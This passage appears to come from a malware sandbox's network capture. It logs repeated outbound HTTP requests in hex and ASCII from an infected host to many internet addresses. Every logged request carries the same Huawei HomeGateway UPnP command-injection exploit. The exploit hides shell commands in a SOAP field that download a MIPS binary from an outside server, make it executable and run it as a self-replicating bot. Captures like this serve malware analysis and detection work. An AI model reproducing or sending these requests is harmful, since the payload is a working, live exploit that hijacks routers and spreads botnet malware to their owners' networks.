                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1350192.168.2.2358596197.97.166.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334341049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1351192.168.2.2349518159.240.49.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334567070 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1352192.168.2.2353484197.121.42.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334626913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1353192.168.2.2358978157.175.29.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334659100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1354192.168.2.2336938157.96.170.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334665060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1355192.168.2.2346008170.188.64.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334680080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1356192.168.2.234053642.173.134.13437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336052895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1357192.168.2.234878041.197.3.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336090088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1358192.168.2.2344846202.203.104.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336097002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1359192.168.2.2338954197.40.121.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.336107016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 